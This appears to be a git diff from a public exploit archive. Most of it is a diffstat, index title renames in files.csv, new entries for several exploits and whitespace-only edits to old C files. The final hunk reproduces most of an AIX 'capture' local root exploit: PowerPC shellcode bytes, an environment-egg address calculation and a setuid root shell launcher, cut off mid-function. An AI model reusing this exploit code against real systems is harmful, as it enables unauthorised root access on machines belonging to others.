| 454 +- platforms/windows/remote/8916.py | 132 +- platforms/windows/remote/8930.txt | 230 +- platforms/windows/remote/8970.txt | 168 +- platforms/windows/remote/8986.txt | 100 +- platforms/windows/remote/9002.c | 498 +- platforms/windows/remote/9031.py | 136 +- platforms/windows/remote/906.c | 6 +- platforms/windows/remote/9065.c | 92 +- platforms/windows/remote/909.cpp | 6 +- platforms/windows/remote/9093.txt | 82 +- platforms/windows/remote/9139.pl | 72 +- platforms/windows/remote/92.c | 6 +- platforms/windows/remote/9224.py | 315 +- platforms/windows/remote/930.html | 6 +- platforms/windows/remote/9303.c | 118 +- platforms/windows/remote/9318.py | 116 +- platforms/windows/remote/9319.py | 102 +- platforms/windows/remote/9330.py | 90 +- platforms/windows/remote/944.c | 6 +- platforms/windows/remote/9443.txt | 128 +- platforms/windows/remote/945.c | 6 +- platforms/windows/remote/9468.py | 124 +- platforms/windows/remote/947.pl | 6 +- platforms/windows/remote/949.c | 6 +- platforms/windows/remote/9500.cpp | 344 +- platforms/windows/remote/9508.rb | 130 +- platforms/windows/remote/952.pl | 6 +- platforms/windows/remote/953.c | 6 +- platforms/windows/remote/960.c | 6 +- platforms/windows/remote/9613.py | 278 +- platforms/windows/remote/9615.jar | 446 +- platforms/windows/remote/9643.txt | 62 +- platforms/windows/remote/9649.txt | 146 +- platforms/windows/remote/9652.sh | 178 +- platforms/windows/remote/9660.pl | 76 +- platforms/windows/remote/9663.py | 208 +- platforms/windows/remote/9676.txt | 84 +- platforms/windows/remote/9694.txt | 52 +- platforms/windows/remote/97.c | 6 +- platforms/windows/remote/9704.html | 210 +- platforms/windows/remote/9705.html | 112 +- platforms/windows/remote/976.cpp | 6 +- platforms/windows/remote/979.txt | 6 +- platforms/windows/remote/987.c | 6 +- platforms/windows/remote/990.c | 6 +- 7877 files changed, 590387 insertions(+), 589604 deletions(-) create mode 100755 platforms/freebsd_x86-64/dos/39570.c create mode 100755 platforms/hardware/remote/39568.py create mode 100755 platforms/multiple/remote/39569.py create mode 100755 platforms/perl/webapps/39564.txt create mode 100755 platforms/windows/dos/39565.txt diff --git a/files.csv b/files.csv index 90b4dc0d5..5e03f29d5 100755 --- a/files.csv +++ b/files.csv @@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 -3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0 +3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 @@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 -10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80 +10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 @@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 -11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 +11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 @@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 -11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0 +11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 @@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 -12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0 +12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 @@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 -12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 +12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 @@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 -12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 +12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 @@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 -12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 +12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 @@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 -14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 +14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0 @@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 -12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 +12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 @@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 -14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 +14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 @@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 -14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 +14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0 @@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 -17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 +17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 @@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 -24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 +24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 @@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 -30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0 +30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 @@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0 -34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0 +34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 @@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 -35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0 +35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 @@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port 39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 +39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 +39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 +39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443 +39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22 +39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 diff --git a/platforms/aix/local/1044.c b/platforms/aix/local/1044.c index b888351ce..9a21e1c0b 100755 --- a/platforms/aix/local/1044.c +++ b/platforms/aix/local/1044.c @@ -94,6 +94,6 @@ int main() execve( "/usr/bin/netpmon", args, envs ); return( 0 ); -} - -// milw0rm.com [2005-06-14] +} + +// milw0rm.com [2005-06-14] diff --git a/platforms/aix/local/1045.c b/platforms/aix/local/1045.c index 0f2d2c991..69e8f81e6 100755 --- a/platforms/aix/local/1045.c +++ b/platforms/aix/local/1045.c @@ -95,6 +95,6 @@ int main() execve( "/usr/sbin/ipl_varyon", args, envs ); return( 0 ); -} - -// milw0rm.com [2005-06-14] +} + +// milw0rm.com [2005-06-14] diff --git a/platforms/aix/local/1046.c b/platforms/aix/local/1046.c index 4daa0c832..b310be688 100755 --- a/platforms/aix/local/1046.c +++ b/platforms/aix/local/1046.c @@ -94,6 +94,6 @@ int main() execve( "/usr/bin/paginit", args, envs ); return( 0 ); -} - -// milw0rm.com [2005-06-14] +} + +// milw0rm.com [2005-06-14] diff --git a/platforms/aix/local/333.c b/platforms/aix/local/333.c index ddd748e3a..10912b946 100755 --- a/platforms/aix/local/333.c +++ b/platforms/aix/local/333.c @@ -155,6 +155,6 @@ L=`expr $L + 144` ./a.out $L done /str0ke - */ - -// milw0rm.com [1997-05-27] + */ + +// milw0rm.com [1997-05-27] diff --git a/platforms/aix/local/335.c b/platforms/aix/local/335.c index 6b653840b..4e76450d8 100755 --- a/platforms/aix/local/335.c +++ b/platforms/aix/local/335.c @@ -156,6 +156,6 @@ do echo $L L=`expr $L + 42` ./a.out $L -done */ - -// milw0rm.com [1997-05-26] +done */ + +// milw0rm.com [1997-05-26] diff --git a/platforms/aix/local/4231.c b/platforms/aix/local/4231.c index 17cd1b401..6ce19eb65 100755 --- a/platforms/aix/local/4231.c +++ b/platforms/aix/local/4231.c @@ -1,178 +1,178 @@ -/* 07/2007: public release - * IBM AIX <= 5.3 sp6 - * - * AIX capture Local Root Exploit - * By qaaz - */ -#include -#include -#include - -#include -#include -#include -#include - -#define TARGET "/usr/bin/capture" -#define VALCNT 40 - -#define MAX(x,y) ((x) > (y) ? (x) : (y)) -#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) - -unsigned char qaazcode[] = -"\x60\x60\x60\x60\x60\x60\x60\x60" -"\x7c\x63\x1a\x79\x40\x82\xff\xfd" -"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" -"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" -"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" -"\x44\xff\xff\x02\x38\x75\xff\x5f" -"\x38\x63\x01\x01\x88\x95\xff\x5d" -"\x38\x63\x01\x02\x38\x63\xfe\xff" -"\x88\xa3\xfe\xff\x7c\x04\x28\x40" -"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" -"\x98\xa3\xfe\xff\x88\x55\xff\x5c" -"\x38\x75\xff\x5f\x38\x81\xff\xf8" -"\x90\x61\xff\xf8\x90\xa1\xff\xfc" -"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; - -void shell(int p1[2], int p2[2]) -{ - ssize_t n; - fd_set rset; - char buf[4096]; - - for (;;) { - FD_ZERO(&rset); - FD_SET(p1[0], &rset); - FD_SET(p2[0], &rset); - - n = select(MAX(p1[0], p2[0]) + 1, - &rset, NULL, NULL, NULL); - if (n < 0) { - perror("[-] select"); - break; - } - - if (FD_ISSET(p1[0], &rset)) { - n = read(p1[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p1[1], buf, n); - } - if (FD_ISSET(p2[0], &rset)) { - n = read(p2[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p2[1], buf, n); - } - } -} - -/* just because you don't understand it doesn't mean it has to be wrong */ -ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) -{ - ulong top, len, off; - int i; - - len = 0; - for (i = 0; argv[i]; i++) - len += strlen(argv[i]) + 1; - for (i = 0; envp[i]; i++) - len += strlen(envp[i]) + 1; - top = (ulong) argv[0] + ALIGN(len, 8); - - len = off = 0; - for (i = 0; args[i]; i++) - len += strlen(args[i]) + 1; - for (i = 0; envs[i]; i++) { - if (!strncmp(envs[i], "EGG=", 4)) - off = len + 4; - len += strlen(envs[i]) + 1; - } - while (off & 3) - strcat(envs[0], "X"), off++, len++; - - return top - ALIGN(len, 4) + off; -} - -int main(int argc, char *argv[], char *envp[]) -{ - char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; - char *args[] = { TARGET, "/dev/null", NULL }; - char *envs[] = { pad, bsh, egg, NULL }; - int ptm, pts, pi[2]; - pid_t child; - ulong addr; - - sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); - sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); - addr = get_addr(argv, envp, args, envs); - - if (!envp[0]) { - dup2(3, 0); - - setuid(geteuid()); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - execl("/bin/sh", "sh", "-i", NULL); - perror("[-] execl"); - exit(1); - } else if (argc && !strcmp(argv[0], "bsh")) { - char i, 